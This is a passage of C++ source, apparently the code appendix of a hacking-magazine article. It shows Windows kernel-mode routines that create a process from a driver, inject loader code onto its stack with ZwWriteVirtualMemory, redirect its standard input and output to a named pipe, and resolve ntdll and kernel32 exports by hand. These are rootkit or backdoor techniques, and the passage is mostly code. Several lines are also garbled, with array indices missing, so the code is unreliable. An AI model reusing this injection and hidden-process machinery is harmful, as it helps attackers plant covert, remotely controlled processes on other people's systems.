   if (!NT::RtlValidSecurityDescriptor(sd)) {
      _asm int 3;
   }
      
      //To try!
      ULONG buflen = PAGE_SIZE*2;
      *pSecurityDescriptor = NT::ExAllocatePool(NT::PagedPool, buflen);
   if (!*pSecurityDescriptor) return STATUS_INSUFFICIENT_RESOURCES;
      return RtlAbsoluteToSelfRelativeSD(sd, *pSecurityDescriptor, &buflen);
}

#define PIPE_NAME_MAX 40*2

extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess)
{
      NT::IO_STATUS_BLOCK           iosb;
      
      NT::OBJECT_ATTRIBUTES attr = {sizeof attr, 0, PipeName, OBJ_INHERIT, sd};
      NT::LARGE_INTEGER nTimeOut;
      nTimeOut.QuadPart = (__int64)-1E7;
      return ZwCreateNamedPipeFile(phPipe, DesiredAccess | SYNCHRONIZE | FILE_ATTRIBUTE_TEMPORARY, &attr, &iosb, ShareAccess,
           FILE_CREATE, 0, FALSE, FALSE, FALSE, 1, 0x1000, 0x1000, &nTimeOut);      
}

int exec_piped(NT::PUNICODE_STRING name, NT::PUNICODE_STRING PipeName)
{
   HANDLE hProcess, hThread, hSection, hFile;
      
      //_asm int 3;

   NT::OBJECT_ATTRIBUTES oa = {sizeof oa, 0, name, OBJ_CASE_INSENSITIVE};
   NT::IO_STATUS_BLOCK iosb;
   NT::ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb,
             FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

   oa.ObjectName = 0;
      
   NT::ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, 0,
                PAGE_EXECUTE, SEC_IMAGE, hFile);

   NT::ZwClose(hFile);

      ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa,
                NtCurrentProcess(), TRUE, hSection, 0, 0);
      
   NT::SECTION_IMAGE_INFORMATION sii;
   NT::ZwQuerySection(hSection, NT::SectionImageInformation,
                &sii, sizeof sii, 0);

   NT::ZwClose(hSection);

   NT::USER_STACK stack = {0};

   ULONG n = sii.StackReserve;
   NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
                      MEM_RESERVE, PAGE_READWRITE);

   stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
                    + sii.StackReserve;
   stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
                     - sii.StackCommit;

      /* PAGE_EXECUTE_READWRITE is needed if initialisation code will be executed on stack*/
      n = sii.StackCommit + PAGE_SIZE;
   PVOID p = PCHAR(stack.ExpandableStackBase) - n;
   NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_EXECUTE_READWRITE);

   ULONG x; n = PAGE_SIZE;
   ZwProtectVirtualMemory(hProcess, &p, &n,
                     PAGE_READWRITE | PAGE_GUARD, &x);

   NT::CONTEXT context = {CONTEXT_FULL};
   context.SegGs = 0;
   context.SegFs = 0x38;
   context.SegEs = 0x20;
   context.SegDs = 0x20;
   context.SegSs = 0x20;
   context.SegCs = 0x18;
   context.EFlags = 0x3000;
   context.Esp = ULONG(stack.ExpandableStackBase) - 4;
   context.Eip = ULONG(sii.EntryPoint);

   NT::CLIENT_ID cid;

   ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
                hProcess, &cid, &context, &stack, TRUE);

   NT::PROCESS_BASIC_INFORMATION pbi;
   NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation,
                       &pbi, sizeof pbi, 0);
      
      HANDLE hPipe,hPipe1;
      oa.ObjectName = PipeName;
      oa.Attributes = OBJ_INHERIT;
      if(NT::ZwOpenFile(&hPipe1, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &oa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE)) return 0;
      NT::ZwDuplicateObject(NtCurrentProcess(), hPipe1, hProcess, &hPipe,
           0, 0, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE);
      
      CreateProcessParameters(hProcess, pbi.PebBaseAddress, name, hPipe);

   InformCsrss(hProcess, hThread,
           ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));
      
   ZwResumeThread(hThread, 0);

   NT::ZwClose(hProcess);
   NT::ZwClose(hThread);

   return int(cid.UniqueProcess);
}

int execute_piped(VOID *ImageFileName, NT::PUNICODE_STRING PipeName)
{
   NT::UNICODE_STRING ImageFile;
   NT::RtlInitUnicodeString(&ImageFile, (wchar_t *)ImageFileName);
   return exec_piped(&ImageFile, PipeName);
}


----[ 8.5 - NebbetCreateProcess.diff

268a269,384
> typedef
> WINBASEAPI
> BOOL
> (WINAPI
> *f_SetStdHandle)(
>    IN DWORD nStdHandle,
>    IN HANDLE hHandle
>    );
> typedef
> WINBASEAPI
> HANDLE
> (WINAPI
> *f_CreateFileW)(
>    IN LPCWSTR lpFileName,
>    IN DWORD dwDesiredAccess,
>    IN DWORD dwShareMode,
>    IN LPSECURITY_ATTRIBUTES lpSecurityAttributes,
>    IN DWORD dwCreationDisposition,
>    IN DWORD dwFlagsAndAttributes,
>    IN HANDLE hTemplateFile
>    );
> #ifdef _DEBUG
> typedef
> WINBASEAPI
> DWORD
> (WINAPI
> *f_GetLastError)(
>    VOID
>    );
> #endif
> typedef VOID (*f_EntryPoint)(VOID);
>
> struct s_data2embed
> {
>      wchar_t PipeName[PIPE_NAME_MAX];
>      //wchar_t RPipeName[PIPE_NAME_MAX], WPipeName[PIPE_NAME_MAX];
>      f_SetStdHandle pSetStdHandle;
>      f_CreateFileW pCreateFileW;
>      f_EntryPoint EntryPoint;
> #ifdef _DEBUG
>      f_GetLastError pGetLastError;
> #endif
> };
>
> //void before_code2embed(){};
> void code2embed(s_data2embed *embedded_data)
> {
>      HANDLE hPipe;
>
>      __asm int 3;
>      hPipe = embedded_data->pCreateFileW(embedded_data->PipeName,
>            GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
>            0/*FILE_SHARE_READ | FILE_SHARE_WRITE*/,
>            NULL,
>            OPEN_EXISTING,
>            0/*FILE_ATTRIBUTE_NORMAL*/,
>            NULL);
>      embedded_data->pGetLastError();
>      /*//if (hRPipe==INVALID_HANDLE_VALUE) goto cont;
>      hWPipe = embedded_data->pCreateFileW(embedded_data->WPipeName,
>            GENERIC_WRITE | SYNCHRONIZE,
>            FILE_SHARE_READ /*| FILE_SHARE_WRITE*,
>            NULL,
>            OPEN_EXISTING,
>            0,
>            NULL);
>      embedded_data->pGetLastError();
>      if ((hRPipe!=INVALID_HANDLE_VALUE)&&(hWPipe!=INVALID_HANDLE_VALUE)) */
>      if (hPipe!=INVALID_HANDLE_VALUE)
>      {
>            embedded_data->pSetStdHandle(STD_INPUT_HANDLE, hPipe);
>            embedded_data->pSetStdHandle(STD_OUTPUT_HANDLE, hPipe);
>            embedded_data->pSetStdHandle(STD_ERROR_HANDLE, hPipe);
>      }
>      embedded_data->EntryPoint();
> }
> __declspec(naked) void after_code2embed(){};
> #define sizeof_code2embed ((ULONG)&after_code2embed-(ULONG)&code2embed)
>
> void redir2pipe(HANDLE hProcess, wchar_t *PipeName/*, wchar_t *WPipeName*/, PVOID EntryPoint, PVOID pStack, /*OUT PULONG pData,*/ OUT PULONG pCode, OUT PULONG pNewStack)
> {
>      s_data2embed data2embed;
>      PVOID pKERNEL32;
>      NT::UNICODE_STRING ModuleFileName;
>      
>      _asm int 3;
>
>      *pCode = 0;
>      *pNewStack = 0;
>      NT::RtlInitUnicodeString(&ModuleFileName, L"kernel32.dll");
>      LdrGetDllHandle(NULL, NULL, &ModuleFileName, &pKERNEL32);
>      if (!pKERNEL32) return;
>      data2embed.pSetStdHandle=(f_SetStdHandle)FindFunc(pKERNEL32, "SetStdHandle");
>      data2embed.pCreateFileW=(f_CreateFileW)FindFunc(pKERNEL32, "CreateFileW");
> #ifdef _DEBUG
>      data2embed.pGetLastError=(f_GetLastError)FindFunc(pKERNEL32, "GetLastError");
> #endif
>      if ((!data2embed.pSetStdHandle)||(!data2embed.pCreateFileW)) return;
>      data2embed.EntryPoint=(f_EntryPoint)EntryPoint;
>      wcscpy(data2embed.PipeName, PipeName);
>      //wcscpy(data2embed.WPipeName, WPipeName);
>      char* p = (char*)pStack - sizeof_code2embed;
>      if (ZwWriteVirtualMemory(hProcess, p, &code2embed, sizeof_code2embed, 0)) return;
>      *pCode = (ULONG)p;
>      
>      p -= sizeof s_data2embed;
>      if (ZwWriteVirtualMemory(hProcess, p, &data2embed, sizeof s_data2embed, 0)) return;
>      
>      PVOID pData = (PVOID)p;
>      p -= sizeof pData;
>      if (ZwWriteVirtualMemory(hProcess, p, &pData, sizeof pData, 0)) return;
>      
>      p -= 4;
>      *pNewStack = (ULONG)p;
> }
>
317a434,437
>      ULONG newEIP, NewStack;
>      redir2pipe(hProcess, PipeName->Buffer, sii.EntryPoint, stack.ExpandableStackBase, &newEIP, &NewStack);
>      if ((!NewStack)||(!newEIP)) return 0;
>
326,327c446,449
<    context.Esp = ULONG(stack.ExpandableStackBase) - 4;
<    context.Eip = ULONG(sii.EntryPoint);
---
>      //loader code is on the stack
>      context.Esp = NewStack;
>    context.Eip = newEIP;


----[ 8.6 - NtdllDynamicLoader.cpp

#include <ntdll.h>
//#include "UndocKernel.h"
#include "DynLoadFromNtdll.h"

//Example A.2 from Nebbet&#39;s book

//Search loaded module by name
PVOID FindModule(char *module)
{
      ULONG n;
      //Request necessary size of buffer
      NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
                      &n, 0, &n);
      //Allocate memory for n structures
   PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      //Request information about modules
   NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
                      q, n * sizeof *q, 0);

      //Module counter located at address q, information begins at q+1
   NT::PSYSTEM_MODULE_INFORMATION p
      = NT::PSYSTEM_MODULE_INFORMATION(q + 1);
   PVOID ntdll = 0;

      //Cycle for each module ...
      for (ULONG i = 0; i < *q; i++)
      {
           //...compare it&#39;s name with looked for...
           if (_stricmp(p.ImageName + p.ModuleNameOffset,
              module) == 0)
           {
                //...and stop if module found
                ntdll = p.Base;
                break;
           }
      }
      //Free memory
   NT::ExFreePool(q);
   return ntdll;
}

PVOID FindNT()
{
   return FindModule("ntdll.dll");
}

//Search exported function named Name in module, loaded at addrress Base
PVOID FindFunc(PVOID Base, PCSTR Name)
{
      //At addrress Base there is DOS EXE header
      PIMAGE_DOS_HEADER dos = PIMAGE_DOS_HEADER(Base);
      //Extract offset of PE-header from it
   PIMAGE_NT_HEADERS nt = PIMAGE_NT_HEADERS(PCHAR(Base) + dos->e_lfanew);
      //Evaluate pointer to section table,
      //according to directory of exported functions
   PIMAGE_DATA_DIRECTORY expdir
      = nt->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
      //Extract address and size of that table
   ULONG size = expdir->Size;
   ULONG addr = expdir->VirtualAddress;

      //Evaluate pointers:
      // - to directory of exported functions
   PIMAGE_EXPORT_DIRECTORY exports
      = PIMAGE_EXPORT_DIRECTORY(PCHAR(Base) + addr);
      // - to table of addresses
   PULONG functions = PULONG(PCHAR(Base) + exports->AddressOfFunctions);
      // - to table of ordinals
   PSHORT ordinals  = PSHORT(PCHAR(Base) + exports->AddressOfNameOrdinals);
      // - to table of names
   PULONG names    = PULONG(PCHAR(Base) + exports->AddressOfNames);

   //Cycle through table of names ...
      for (ULONG i = 0; i < exports->NumberOfNames; i++) {
           //Ordinal that matches name is index in the table of addresses
      ULONG ord = ordinals;
           //Test is the address correct
      if (functions[ord] < addr  ||  functions[ord] >= addr + size) {
                //If function name matches looked for...
        if (strcmp(PSTR(PCHAR(Base) + names), Name) == 0)